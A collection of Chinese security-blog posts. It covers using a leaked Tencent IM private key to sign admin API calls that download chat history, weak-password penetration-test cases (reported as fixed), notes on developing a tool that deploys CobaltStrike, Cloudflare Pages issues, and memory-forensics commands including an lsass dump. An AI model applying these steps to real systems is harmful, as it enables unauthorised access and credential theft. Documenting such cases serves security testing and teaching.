
还可以修改成员假期余额，这里就不测试了

泄漏即时通信IM配置

qq.im.sdkappid=脱敏脱敏脱敏
qq.im.privateKey=脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏
qq.im.identifier=脱敏脱敏脱敏
qq.im.apiver=2
qq.live.bizid=脱敏脱敏脱敏

通过查看官方文档 https://cloud.tencent.com/document/product/269/32688 UserSig 是用户登录即时通信 IM 的密码，其本质是对 UserID 等信息加密后得到的密文，首先要生成 UserSig

https://github.com/tencentyun/qcloud-documents/blob/master/product/%E8%A7%86%E9%A2%91%E6%9C%8D%E5%8A%A1/%E5%AE%9E%E6%97%B6%E9%9F%B3%E8%A7%86%E9%A2%91/%E5%B8%B8%E8%A7%81%E9%97%AE%E9%A2%98/%E5%A6%82%E4%BD%95%E8%AE%A1%E7%AE%97UserSig.md

https://github.com/tencentyun/tls-sig-api-v2-python

pip3 install tls-sig-api-v2

vim test.py

import TLSSigAPIv2

api = TLSSigAPIv2.TLSSigAPIv2(脱敏脱敏脱敏, '脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏')
sig = api.gen_sig("脱敏脱敏脱敏")
print(sig)

运行生成 UserSig,注意这个 UserSig 有效期很短，一般几分钟就要重新生成一次

eJw1zcEKgkAUheFXkVmH3hk脱敏脱敏脱敏脱敏脱敏脱敏脱敏v-gnDdJt3u9VRVZaoTpQBbaWFCqe脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏

生成后按照文档里描述的填写

https://cloud.tencent.com/document/product/269/1520

获取 App 中的所有群组

https://console.tim.qq.com/v4/group_open_http_svc/get_appid_group_list?sdkappid=1400571601&identifier=admin&usersig=eJw1zcEKgkAU脱敏脱敏脱敏脱敏脱敏脱敏脱敏qW1iiJlr07qXp9v-gnDdJt3u9VRVZaoTpQBbaWFCqe脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏&random=99999999&contenttype=json

拉取运营数据

https://console.tim.qq.com/v4/openconfigsvr/getappinfo?sdkappid=1400571601&identifier=vc_system&usersig=eJw1zcEKgkAUheFXkVm脱敏脱敏脱敏脱敏脱敏脱敏脱敏07qXp9v-gnDdJt3u9VRVZaoTpQBbaWFCqe脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏&random=99999999

下载最近消息记录

https://console.tim.qq.com/v4/open_msg_svc/get_history?sdkappid=1400571601&identifier=vc_system&usersig=eJw1zcEKgkAU脱敏脱敏脱敏脱敏脱敏脱敏脱敏p9v-gnDdJt3u9VRVZaoTpQBbaWFCqe脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏&random=99999999&contenttype=json

获取服务器 IP 地址

https://console.tim.qq.com/v4/ConfigSvc/GetIPList?sdkappid=1400571601&identifier=vc_system&usersig=eJw1zcEKgkAUheFXkVmH3hk脱敏脱敏脱敏脱敏脱敏脱敏脱敏9v-gnDdJt3u9VRVZaoTpQBbaWFCqe脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏&random=99999999&contenttype=json

可以用在线网页进行验证 https://tcc.tencentcs.com/im-api-tool/index.html#v4/group_open_http_svc/get_appid_group_list

弱口令案例大礼包

Wed, 30 Mar 2022 08:08:03 +0800

最近翻看以前的渗透案例,发现不少有意思的入口点,基本都是弱口令+信息泄漏打进去,然后这里上传那里注入这样的后台打法,干脆总结个弱口令案例分享出来

info

关键信息均已打码,漏洞均已提交 edusrc 和 cnvd 并修复

某学院学工系统信息泄漏案例

通过前期的信息收集找到目标学院的一个学工系统登录点

这一看就是 ruoyi 的站嘛。。直接用ruoyi 默认的 admin 和 ry 账号去测试登录,提示没有该用户，那尝试其他渠道搜集下用户

右下角有个明晃晃的在线帮助文档，点进去看看

文档描述对应小程序的使用方法，不过这个不是重点，翻到最下面

默认123456，肯定有很多学生是不改的，那这只剩下弄到用户了，这2张图上有登录的账号，放大看看

可以，收获一个学号，不过注意到这个帮助文档有不同用户角色的介绍，点击任务发布者的看看

管理员的我点进去，他全部删干净了，啥都没有

点击图片详情，上面是任务发布者权限账号

现在到后台测试登录，很幸运，任务发布者和学生的这2个账号都没有修改过密码

那剩下的就简单了，后台翻翻，找到了一个查询点，里面有学生的任务记录，关键是响应包里有相应的学号，直接导出json格式的返回包

用jq进行格式化处理，得到学号信息，由于有验证码无法批量爆破,手动测试了几个,基本都是 123456，这波收集到大量的学生学号，测这个学校其他分站就容易多了

根据官网上的人员姓名生成字典突破的案例

这个站没截前台的图，只有后台的图，大致描述下，主页有个主要领导的链接，点进去是这个单位的一些领导的介绍，复制名字，根据中文用户名生产用户名字典

比如

张三
zhangsan
zhangs
san.zhang
zs

后来证明我想多了，他用户名就是中文的。。。。。

三顾茅庐的某站点

为啥说是三顾茅庐呢，因为这个站测了3次，修了3次

第一次，admin/123456,没啥好说的

第二次,发现有sourcemap，下载下来，用shuji进行还原

1
2
3

wget https://xx.xxxxxx.com/xxxxx/static/js/app.aa2478xxxxxxxxxe0c.js.map

shuji xxxx.map -o folder

在js中翻到有2个vue的变量 /api 和 /dev_liufeng

猜想这个 liufeng 会不会是测试人员的姓名呢，登录试试

好吧

第三次，在历经了前2次的测试后，按弱口令爆破顺序，依次爆破账号

常见用户名
中文名转拼音
数字/工号
常用测试邮箱
常用测试手机号

终于，在爆破到测试手机号的时候，又爆破出来了

f8x 开发记录

Wed, 01 Dec 2021 23:08:03 +0800

记录开发 f8x 工具过程中的一些思路和问题,想到哪里写哪里,长期更新

系统兼容

系统兼容是个非常重要的问题,如果只能在 centos 上跑,而不能在 ubuntu 上跑,这个部署工具一定是失败的

那么问题来了,shell 脚本本来就是由 linux 命令组成,怎么会换一个发行版就不能跑

原因比较复杂,例如 : 不同的包管理器,不同的防火墙,不同的网络配置文件,等

其中最麻烦的就是不同的包管理工具,牵扯到不同的安装命令,不同的镜像源配置方式,甚至同发行版下不同版本的源地址,包管理器进程的锁处理,贼烦

case $Linux_Version in
    *"CentOS"*|*"RedHat"*|*"Fedora"*)
        yum install -y gdb 1> /dev/null 2>> /tmp/f8x_error.log && echo -e "\033[1;36m$(date +"%H:%M:%S")\033[0m \033[1;32m[INFOR]\033[0m - \033[1;32m已安装 gdb 工具\033[0m" || echo -e "\033[1;36m$(date +"%H:%M:%S")\033[0m \033[1;31m[ERROR]\033[0m - \033[1;31m安装 gdb 工具失败,请查看日志 /tmp/f8x_error.log \n\033[0m"
        ;;
    *"Kali"*|*"Ubuntu"*|*"Debian"*)
        apt-get install -y gdb 1> /dev/null 2>> /tmp/f8x_error.log && echo -e "\033[1;36m$(date +"%H:%M:%S")\033[0m \033[1;32m[INFOR]\033[0m - \033[1;32m已安装 gdb 工具\033[0m" || echo -e "\033[1;36m$(date +"%H:%M:%S")\033[0m \033[1;31m[ERROR]\033[0m - \033[1;31m安装 gdb 工具失败,请查看日志 /tmp/f8x_error.log \n\033[0m"
        ;;
    *) ;;
esac

# ===================== Modify CentOS YUM sources =====================
Update_CentOS_Mirror(){

    case $Linux_Version_Num in
        "8 Stream")
            Echo_INFOR "pass"
            ;;
        8)
            rm -f /etc/yum.repos.d/CentOS-Base.repo.bak > /dev/null 2>&1 && cp /etc/yum.repos.d/CentOS-Base.repo /etc/yum.repos.d/CentOS-Base.repo.bak > /dev/null 2>&1 && Echo_INFOR "Backed up Yum sources"
            curl -o /etc/yum.repos.d/CentOS-Base.repo https://mirrors.aliyun.com/repo/Centos-8.repo > /dev/null 2>&1 && Echo_INFOR "Downloaded aliyun Yum sources" || Echo_ERROR "aliyun Yum sources download failed,"
            ;;
        7)
            rm -f /etc/yum.repos.d/CentOS-Base.repo.bak > /dev/null 2>&1 && cp /etc/yum.repos.d/CentOS-Base.repo /etc/yum.repos.d/CentOS-Base.repo.bak > /dev/null 2>&1 && Echo_INFOR "Backed up Yum sources"
            curl -o /etc/yum.repos.d/CentOS-Base.repo http://mirrors.aliyun.com/repo/Centos-7.repo > /dev/null 2>&1 && Echo_INFOR "Downloaded aliyun Yum sources" || Echo_ERROR "aliyun Yum sources download failed,"
            ;;
        6)
            rm -f /etc/yum.repos.d/CentOS-Base.repo.bak > /dev/null 2>&1 && cp /etc/yum.repos.d/CentOS-Base.repo /etc/yum.repos.d/CentOS-Base.repo.bak > /dev/null 2>&1 && Echo_INFOR "Backed up Yum sources"
            curl -o /etc/yum.repos.d/CentOS-Base.repo https://mirrors.aliyun.com/repo/Centos-6.repo > /dev/null 2>&1 && Echo_INFOR "Downloaded aliyun Yum sources" || Echo_ERROR "aliyun Yum sources download failed,"
            ;;
        *)
            Echo_ERROR "Version error"
            ;;
    esac

}

f8x 工具中使用 cat /etc/*-release | head -n 1 来匹配发行版和具体版本,期间也使用过 lsb_release -c 命令,但是在 docker 环境中无法兼容,所以使用上述命令来提高兼容性

    case $(cat /etc/*-release | head -n 1) in
        *"Kali"*|*"kali"*)
            Linux_Version="Kali"
            case $(cat /etc/*-release | head -n 4) in
                *"2021"*)
                    Linux_Version_Num="kali-rolling"
                    Linux_Version_Name="buster"
                    ;;
                *"2020"*)
                    Linux_Version_Num="kali-rolling"
                    Linux_Version_Name="buster"
                    ;;
                *)
                    Linux_Version_Num="kali-rolling"
                    Linux_Version_Name="stretch"
                    ;;
            esac
            ;;
        *"Ubuntu"*|*"ubuntu"*)
            Linux_Version="Ubuntu"
            case $(cat /etc/*-release | head -n 4) in
                *"impish"*)
                    Linux_Version_Num="21.10"
                    Linux_Version_Name="impish"
                    ;;
                *"hirsute"*)
                    Linux_Version_Num="21.04"
                    Linux_Version_Name="hirsute"
                    ;;
                *"groovy"*)
                    Linux_Version_Num="20.10"
                    Linux_Version_Name="groovy"
                    ;;
                *"focal"*)
                    Linux_Version_Num="20.04"
                    Linux_Version_Name="focal"
                    ;;
                ...
                *)
                    Echo_ERROR "Unknown Ubuntu Codename"
                    exit 1
                    ;;
            esac
            ;;

然并卵,在部分云平台的机器中,甚至连 /etc/*-release 文件都没有!要么就是直接把 /etc/*-release 文件改的妈都不认识,说的就是你,Azure

所以在后来的版本中加上了手动输入发行版的功能

            Echo_ERROR "Unknown version"
            echo -e "\033[1;33m\nPlease enter distribution Kali[k] Ubuntu[u] Debian[d] Centos[c] RedHat[r] Fedora[f] AlmaLinux[a] VzLinux[v] Rocky[r]\033[0m" && read -r input
            case $input in
                [kK])
                    Linux_Version="Kali"
                    ;;
                [uU])
                    Linux_Version="Ubuntu"
                    echo -e "\033[1;33m\nPlease enter the system version number [21.10] [21.04] [20.10] [20.04] [19.10] [18.04] [16.04] [15.04] [14.04] [12.04]\033[0m" && read -r input
                    Linux_Version_Name=$input
                    ;;
                [dD])
                    Linux_Version="Debian"
                    echo -e "\033[1;33m\nPlease enter the system version number [11] [10] [9] [8] [7]\033[0m" && read -r input
                    Linux_Version_Name=$input
                    ;;
                [cC])
                    Linux_Version="CentOS"
                    echo -e "\033[1;33m\nPlease enter the system version number [8] [7] [6]\033[0m" && read -r input
                    Linux_Version_Name=$input
                    ;;
                [rR])
                    Linux_Version="RedHat"
                    ;;
                [aA])
                    Linux_Version="AlmaLinux"
                    ;;
                [fF])
                    Linux_Version="Fedora"
                    echo -e "\033[1;33m\nPlease enter the system version number [34] [33] [32]\033[0m" && read -r input
                    Linux_Version_Name=$input
                    ;;
                [vV])
                    Linux_Version="VzLinux"
                    ;;
                [rR])
                    Linux_Version="Rocky"
                    ;;
                *)
                    Echo_ERROR "Unknown version"
                    exit 1
                    ;;
            esac

目前我也没没有找到较好的解决方案,以 docker 官方的安装脚本 https://get.docker.com 为例,在部分 kali 是无法运行的,因为 kali 不分具体版本号,直接不兼容了🤣

环境变量

环境变量的问题是在装 go 时初次发现的,后来在装 CobaltStrike 时愈发严重, CobaltStrike 运行需要用 keytool 工具生成 cobaltstrike.store , 而这个 keytool 工具需要 java 设置 bin 目录的环境变量,在 f8x 自动装完 oraclejdk 后,有时也无法使用 keytool 因为在 shell 脚本中环境变量使用 export, 只在脚本中有效，退出这个脚本，设置的变量就没有了,所以我采用直接写入 bashrc 长期修改环境变量这种方法,但实际场景还是需要使用者手动再开一个 shell 窗口加载环境变量运行 cs

当然使用 source 命令也可以解决问题,因为执行一个脚本文件是在一个子 shell 中运行的,而 source 则是在当前 shell 环境中运行的,这么多环境变量设置我怕影响运行,还是不推荐

SAST

搞安全的怎么可以不扫扫自己开发的东西,shell 脚本的 dast 是不存在的,sast 倒是有一两个,

koalaman/shellcheck

不过扫出来的很多是语法上的错误,也是挺有学习价值的。

更新

无意中发现 shell 脚本可以自己删除自己,这么一说更新功能岂不是挺容易实现的,直接 curl -o f8x https://cdn.jsdelivr.net/gh/ffffffff0x/f8x@main/f8x 覆盖自身即可🤣

`1`	`f8x -update`

代理

代理功能是 f8x 的精髓,就像我在 readme 中缩写的 -p 会执行以下操作

替换你的 DNS(默认为 223.5.5.5), 如果判断是 debian 系还会帮你安装 resolvconf, 长期修改 DNS
检查基础的编译环境是否安装, 并通过默认的包管理器安装 gcc,make,unzip 这些基本软件
可选的从 https://github.com/rofl0r/proxychains-ng 或 ffffffff0x.com 下载 Proxychains-ng 的源码, 编译安装
要求你修改 /etc/proxychains.conf 文件
修改 pip 代理为 https://mirrors.aliyun.com/pypi/simple/
修改 docker 代理为 https://docker.mirrors.ustc.edu.cn , 并重启 docker 服务

事实上,在大部分选项运行时都会询问是否要走代理,这里就有一个开关的 Tricks

# ===================== 代理开关 =====================
Proxy_Switch(){

    if test -e /tmp/IS_CI
    then
        echo -e "\033[1;36m$(date +"%H:%M:%S")\033[0m \033[1;32m[INFOR]\033[0m - \033[1;32mIS_CI\033[0m"
    else
        echo -e "\033[1;33m\n>> 安装时是否需要走代理? [y/N,默认No] \033[0m" && read -r input
        case $input in
            [yY][eE][sS]|[Yy])
                export GOPROXY=https://goproxy.io,direct
                if test -e /etc/proxychains.conf
                then
                    echo -e "\033[1;36m$(date +"%H:%M:%S")\033[0m \033[1;32m[INFOR]\033[0m - \033[1;32m正在调用 Proxychains-ng\033[0m"
                    Proxy_OK=proxychains4
                else
                    echo -e "\033[1;36m$(date +"%H:%M:%S")\033[0m \033[1;33m[ALERT]\033[0m - \033[1;33m未检测到 Proxychains-ng,正在执行自动安装脚本\033[0m"
                    Proxychains_Install
                    Proxy_OK=proxychains4
                fi
                ;;
            *)
                echo -e "\033[1;36m$(date +"%H:%M:%S")\033[0m \033[1;32m[INFOR]\033[0m - \033[1;32mPass~\033[0m"
                ;;
        esac
    fi

}

如果选择那么所有带 Proxy_OK 变量的命令都会自动走 proxychains4,同时该子 shell 中 go 的代理也被配置为 goproxy.io,同时如果并没有安装 proxychains4,那么会自动进行安装

CI

github 提供 action 的 CI 服务, 挺好用的, 我也不用每次都开 vultr 的机器跑试试了, 不过只支持 ubuntu 18 和 20 比较遗憾

每次 f8x 的更新,action 都会自动运行,对 f8x 实际效果感兴趣的话,但手头没有机器的,不妨去看一下运行结果

https://github.com/ffffffff0x/f8x/actions

在 github action 中一些需要输入的情况会被忽略或报错,这与之前的代理请求造成了冲突,于是添加了一个 /tmp/IS_CI 的判断,在 action 运行开始就创建这个文件,f8x 检测到这个文件存在就默认忽略代理

这里要说明一下,action 里面部分工具安装失败有以下几种原因:

机器内存不够
无法进行交互,比如按 Y/N
python 库找不到(这个是大坑)

锁

想必你一定见过以下这种报错

无法获得锁 /var/lib/apt/lists/lock - open (11: 资源暂时不可用)

E: Unable to correct problems, you have held broken packages.

dpkg: error: parsing file '/var/lib/dpkg/updates/0023' near line 0

/var/run/yum.pid 已被锁定，PID 为 1610 的另一个程序正在运行。
另外一个程序锁定了 yum；等待它退出……

这里的锁指的是在使用包管理工具进行安装时,中断造成的问题,由于 f8x 基本不会输出任何报错信息在前台,所以有时候出现假死的状态只有手动以 bash -xv f8x 的方式运行排错,还是挺麻烦的,所以我做了个除锁模块

# ===================== 除锁模块 =====================
Rm_Lock(){

    case $Linux_Version in
        *"CentOS"*|*"RedHat"*|*"Fedora"*)
            rm -f /var/run/yum.pid 1> /dev/null 2>> /tmp/f8x_error.log
            rm -f /var/cache/dnf/metadata_lock.pid 1> /dev/null 2>> /tmp/f8x_error.log
            ;;
        *"Kali"*|*"Ubuntu"*|*"Debian"*)
            rm -rf /var/cache/apt/archives/lock 1> /dev/null 2>> /tmp/f8x_error.log
            rm -rf /var/lib/dpkg/lock-frontend 1> /dev/null 2>> /tmp/f8x_error.log
            rm -rf /var/lib/dpkg/lock 1> /dev/null 2>> /tmp/f8x_error.log
            rm -rf /var/lib/apt/lists/lock 1> /dev/null 2>> /tmp/f8x_error.log
            apt-get --fix-broken install 1> /dev/null 2>> /tmp/f8x_error.log
            rm -rf /var/cache/apt/archives/lock 1> /dev/null 2>> /tmp/f8x_error.log
            rm -rf /var/lib/dpkg/lock-frontend 1> /dev/null 2>> /tmp/f8x_error.log
            rm -rf /var/lib/dpkg/lock 1> /dev/null 2>> /tmp/f8x_error.log
            rm -rf /var/lib/apt/lists/lock 1> /dev/null 2>> /tmp/f8x_error.log
            ;;
        *) ;;
    esac

}

这里由于不同发行版锁文件都不同,依旧做了版本判断,当运行时,会自动除锁

当然,你也可以手动运行进行除锁

`1`	`f8x -rmlock`

单文件还是多文件?

在开发过程中也考虑过采用多文件的方式进行编写,拆分一下结构,后来想一想,本来就是个脚本,在搞5、6个文件夹，没有意义，脚本就是要快，一条命令安装，一条命令使用✌

混淆

之前接触混淆还是在搞免杀的时候,顺手一搜,没想到 shell 也有混淆的项目,https://github.com/Bashfuscator/Bashfuscator

还原是比较困难了,但是用在项目上没啥意义,也许以后渗透中 bypass 命令执行时可以用到🤔

供应链安全

2021-4-22 : 最近正好护网，某红队人员公开了 weblogic_cmd_plus ,没想到带后门,看到 DeadEye安全团队发的文章才意识到被黑吃黑了🤣

总结经验教训

以后要少用直接打包,不公开源码的工具
“开源软件"做混淆,必有蹊跷
用之前,传vt扫一下把
只在vps跑工具

问题解答

我需要的工具不在里面怎么办?

直接提 issue ,说明工具名称和项目地址

为啥不直接装 kali?

kali 是非常优秀的发行版，f8x 配合 kali 可以让你的工具库更加全面。并且支持各种 ctf 工具的安装。

所以不是为了代替什么,更多的是辅助

f8x 未来的方向？

目前 f8x 已经可以做到兼容大部分 linux 发行版，并且支持部署 120+ 款安全工具，所以后续将不断优化兼容性，更新软件版本号等

而 f8x-ctf 还有大量的工作要完成，例如 web、iot、pwn 等方向工具的添加，所以后续重头会放在 f8x-ctf 上

如何保证安装的工具的安全性

工具大部分都是从 github 官方仓库下载，少部分如 anew、marshalsec 为我自己 fork 并编译 release

剩下一些无法直接官方下载的，比如 cs、jdk 等，我就传到 github 仓库中做存档

对安全性存疑，可以手动删除这些下载的工具

目前兼容那些 linux

测试过的

Ubuntu (12.04/14.04/15.04/16.04/18.04/19.10/20.04/20.10/21.04/21.10)
CentOS (6/7/8/8 Stream)
Debian (7/8/9/10/11)
Fedora (32/33/34/35)
Kali (2020/2021)
AlmaLinux
VzLinux
Rocky

后续会不会做出 win、mac 版本的 f8x

win 版本不太可能，mac 版有想法，明年可以试下

结尾在推荐几个我们的项目

1earn - ffffffff0x 团队维护的安全知识框架 - https://github.com/ffffffff0x/1earn
AboutSecurity - 用于渗透测试的 payload 和 bypass 字典 - https://github.com/ffffffff0x/AboutSecurity
Digital-Privacy - 关于数字隐私搜集、保护、清理集一体的方案,外加开源信息收集(OSINT)对抗 - https://github.com/ffffffff0x/Digital-Privacy
BerylEnigma - 为渗透测试与CTF而制作的工具集 - https://github.com/ffffffff0x/BerylEnigma

整个使用过程中遇到的任何问题，欢迎在项目 issue 提出,我会及时解答并处理

Cloudflare Pages 踩坑

Thu, 04 Mar 2021 11:08:03 +0800

在搭建 Cloudflare Pages 过程中的遇到多处坑点,分享一下解决办法和思路

warning

注意,本文写于 2021.3.4,遇到的问题在未来有可能已经解决

最近 Cloudflare Pages 开放使用,第一时间来尝尝鲜,结果遇到多个问题,下面进行下总结

不支持私有仓库

已经给 cloudflare pages 应用配置存储库访问权限,都能选择私有仓库了,结果无法 clone

但关键问题是,其无法 clone 的表现是显示一直在排队,在第二天早上我发现已经排了将近10个小时,改为公开仓库才得以解决

这个问题在去年年底就存在

info

截至我写完这个文章,该问题好像已经被修复,私有仓库也可以 clone

以 hugo 为例,在 themes 目录下 clone 一个主题,该主题文件夹是肯定会存在 .git 目录的,但 cloudflare pages 在 clone 你的仓库时,会 clone 失败

需要手动删除 themes 目录下主题的 .git 目录

默认版本过低

开幕雷击,我都怀疑这开发团队是从 2019 年穿越过来的

不过官方文档也说明了可以自己改变量使用新版本

question

官方你既然知道,那为啥不把 hugo 0.54 换一换呢?

改下变量,可恶,少个 .0

改用较新的 0.81.0

一番折腾后终于成功部署

域名已关联

在测试第一个项目时绑定了 r0fus0d.ffffffff0x.com 域名,但删除第一个项目后,看上去绑定关系还是存在,dns记录中也并没有记录,这种情况下 pages 中域名就不能被使用了

搜了下,同样有人也遇到了这个问题

没有办法,换个子域名,接下来又是个小坑

不支持中文路径

这…

没办法只好改为英文了

内存取证(总结篇)

Tue, 02 Mar 2021 23:08:03 +0800

在之前的文章中总结过内存取证的相关知识，本次文章是对之前的内容进行的补充和汇总。

info

本文来源于我的笔记项目中,后续有更新内容可见内存取证.md

内存获取

这个步骤是从目标机器中导出内存。完整的内存数据包括两部分: 物理内存数据和页面交换文件数据. 物理内存通常是一个特殊的内核对象, 比如, 在 Windows 系统中, 物理内存是内核内存区对象, 即 \\Device\\PhysicalMemory; 在 Unix/Linux 系统中, 物理内存为 /dev/mem 和 /dev/kmem. 只要能读取该内核对象, 就能获取物理内存数据.

你可以在物理机上使用工具比如 Win32dd/Win64dd, Memoryze, DumpIt, FastDump 。然而在虚拟机上，获取内存是很容易的，你可以暂停 VM 并取出 .vmem 文件。

基于硬件的内存获取

根据所面向的硬件体系和操作系统的不同,可以分为以下几种

面向 Intel 架构桌面操作系统的内存获取

此类基于硬件的内存获取方法主要通过插入硬件卡, 利用 DMA(direct memory access, 直接内存访问) 指令去获取物理内存的拷贝. 在拷贝物理内存时, 目标系统的 CPU 将暂停, 以避免因操作系统的执行而改变内存数据. 目前有以下几种类型的硬件卡:

基于 PCI 卡拷贝物理内存 (hardware card based technique)
基于 IEEE 1394 火线接口拷贝物理内存 (hardware bus based technique)
基于固件的物理内存拷贝 (firmware based technique), 利用 PCI 网卡中的 SMM(system management mode, 系统管理模式) 固件获取物理内存和 CPU 寄存器内容;
基于网卡拷贝物理内存 (network card based technique), 比如, 利用网卡的 NDIS(network driver interface specification, 网络驱动程序接口规范) 来获取物理内存;
基于雷电接口 Thunderbolt 拷贝物理内存 (Thunderbolt based technique)

此类方法的优点是:

在基于 Intel 架构的操作系统 (Windows,Linux,Mac OS 等) 中, 都可以利用该方法获取物理内存;
采用 DMA 方式能够在不干扰操作系统和 CPU 的情况下, 较为准确地获取物理内存拷贝.

其缺点是:

如攻击者对主板上的北桥芯片进行重新编程, 则很容易欺骗此类方法;
早期的 PCI 硬件卡须事先插入主板中, 这对于遭受实时攻击的系统来说是不现实的;
新版 BIOS 对 SMM 模式进行锁定, 限制了利用固件获取物理内存的应用;
如果攻击者对 NDIS 库进行劫持, 就能篡改通过网卡传送的物理内存数据;
只能获取物理内存 RAM, 不能获取页面交换文件.

面向 ARM 结构智能终端操作系统的内存获取

面向智能终端的硬件获取方法主要通过硬件与终端设备相连接, 以获取智能终端设备的内存数据. 目前, 基于硬件的内存获取方法主要有两种:

JTAG(joint test action group, 联合测试行动小组)技术;
- JTAG 技术是通过在印刷电路板上与特定的 JTAG 接头相连以连接智能终端设备中的 CPU, 在向电路供电后, 再借助 JTAG 软件转储整个内存数据. 该方法的优点是无需获得智能终端设备的 Root 访问权限即可实现内存数据获取, 但其缺点是, 如果 JTAG 焊接点出错或供电电压错误, 则将导致 JTAG 无法使用, 且对智能终端设备造成严重损坏.
芯片摘取 (chip-off) 技术.
- 芯片摘取 (chip-off) 技术是将内存芯片从智能终端设备中取出, 再通过特殊的硬件设备读取其中存储的数据. 该方法的优点是可绕过智能终端设备的口令保护, 还能修复已遭毁坏的智能终端设备中的数据; 但其缺点是把内存芯片取出和重新装入印刷电路板, 将可能损坏内存芯片.

基于软件的内存获取

Windows

相关工具

moonsols - moonsols 可以处理休眠文件（Hiberfil.sys），crashdump 文件和 raw memory dump 文件，crashdump 可以被 winDBG 加载进行分析，所以最终要转化为 crashdump 文件。
- Dumpit - 一款 windows 内存镜像取证工具。利用它我们可以轻松地将一个系统的完整内存镜像下来，并用于后续的调查取证工作
Belkasoft RAMCapturer
Magnet RAM Capture
Winpmem
FTK Imager
Elcomsoft System Recovery

AvDump - 提取指定 pid 的内存

`1`	`.\avdump64.exe --pid <pid> --exception_ptr 0 --thread_id 0 --dump_level 1 --dump_file lsass.dmp`

Redline

hiberfil.sys

休眠 (hibernate) 是指系统将内存中的数据全部转储到硬盘上一个休眠文件中, 然后切断对所有设备的供电, 并在下次开机时, 系统会将硬盘上的休眠文件内容直接读入内存, 并恢复到休眠之前的状态. 由于休眠文件中保存的是休眠时刻系统的内存记录, 因此, 系统休眠文件也成了获取内存数据的一种方式.

在 Windows 系统中, 当系统进入节能休眠模式时, 会自动生成休眠文件 Hiberfil.sys 且存放在 Windows 系统根目录下.

在 Linux 系统中, 休眠文件保存在 swap 分区中. 在 Mac OS 系统中, 休眠文件保存在 /var/vm/sleepimage 中. 基于系统休眠文件的内存获取方法, 就是利用操作系统这种机制来获取内存数据.

该方法尽管实现简单, 但存在如下缺陷:

由于系统休眠时保存的物理内存 RAM 中的数据, 未包括页面交换文件数据, 导致无法获取全部内存数据;
需要与物理内存 RAM 大小相同的硬盘空间, 以存储休眠文件;
不同操作系统的休眠文件格式未知, 且压缩存放, 这给取证分析该文件带来了困难;
该方法除了需要 BIOS 支持以外, 还需要外围硬件设备能够支持节电状态, 且这些设备驱动必须能够接收电源管理指令.

如果计算机在挂载加密分区时进入休眠状态，则 OTFE 密钥可以直接存储在系统的休眠文件中。

在某些情况下，存在 hiberfil.sys，但尚未使用。最好检查 hiberfil.sys 是否为空（全零字节）

`1`	`cat hiberfil.sys \| tr -d '\0' \| read -n 1 \|\| echo "All null bytes"`

将 hiberfil.sys 转换为 dmp 格式

volatility

volatility_standalone.exe -f d:\hiberfilsys.copy imageinfo
volatility_standalone.exe -f d:\hiberfilsys.copy --profile=Win7SP1x64 hibinfo
volatility_standalone.exe -f d:\hiberfilsys.copy imagecopy --profile=Win7SP1x64 -O hiber.raw
volatility_standalone.exe -f hiberfil.raw --profile=Win7SP1x64 raw2dmp -O hiberfil.dmp

Hibr2Dmp

`1`	`Hibr2Dmp.exe hiberfil.sys hiberfil.dmp`

MEMORY.DMP

MEMORY.DMP 文件是 Windows 操作系统中的内存转储文件，当 Windows 发生错误蓝屏的时候，系统将当前内存（含虚拟内存）中的数据直接写到文件中去，方便定位故障原因。

MAX OSX

相关工具

osxpmem

sudo chown -R root:wheel pmem.kext
sudo chown chmod -R 755 pmem.kext
sudo kextload -v pmem.kext
./osxpmem -f raw mem.bin

MacMemoryReader
Recon for Mac OSX
Blackbag MacQuisition

Linux

相关工具

504ensicsLabs/LiME - LiME 是一个用于获取各种取证数据的命令行工具。

# 编译 LiME
yum install -y gcc make gcc-c++
yum install -y kernel-devel
ls -lisa /usr/src/kernels/
git clone https://github.com/504ensicslabs/lime
cd lime/src
make    # 如果编译失败有可能是 /lib/modules/xxx/ 的 build 链接错误,重新连接即可

# 在这个过程的最后，它被编译成一个可下载的 Linux 版本的内核对象。使用 insmod 命令运行 LiME。此步骤将获取 LiME 格式的内存样本,现在我们已经准备好接收内存镜像了。我想在 usb 上打印，所以我给出了 usb 内存的路径。我必须在这里提醒你一些事情。存储器图像的尺寸并不小，所以要确保在你要拍摄图像的设备中有足够的空间,最后，你可以使用 rmmod 删除模块。
insmod ./lime-3.10.0-1062.18.1.el7.x86_64.ko path=/media/usbaaa/ESD-USB/linux64.mem format=raw
rmmod lime

halpomeranz/lmg - 配合 LiME 获取镜像，简化操作

`1`	`将 lmg-master 内文件放入 LiME 的 src 文件夹，运行 ./lmg 搞定。`

linpmem
Draugr
Volatilitux
Memfetch
Memdump

fmem

git clone https://github.com/NateBrune/fmem
cd fmem

    # ubuntu install dwarfdump
    apt-get install -y dwarfdump

    # centos install dwarfdump
    yum install -y gcc make gcc-c++
    yum install -y elfutils-devel
    yum install -y kernel-devel
    wget https://www.prevanders.net/libdwarf-20201201.tar.gz
    tar -zxvf libdwarf-20201201.tar.gz
    cd libdwarf-20201201
    ./configure
    make
    make install
    cd ../

make    # 如果编译失败有可能是 /lib/modules/xxx/ 的 build 链接错误,重新连接即可
./run.sh
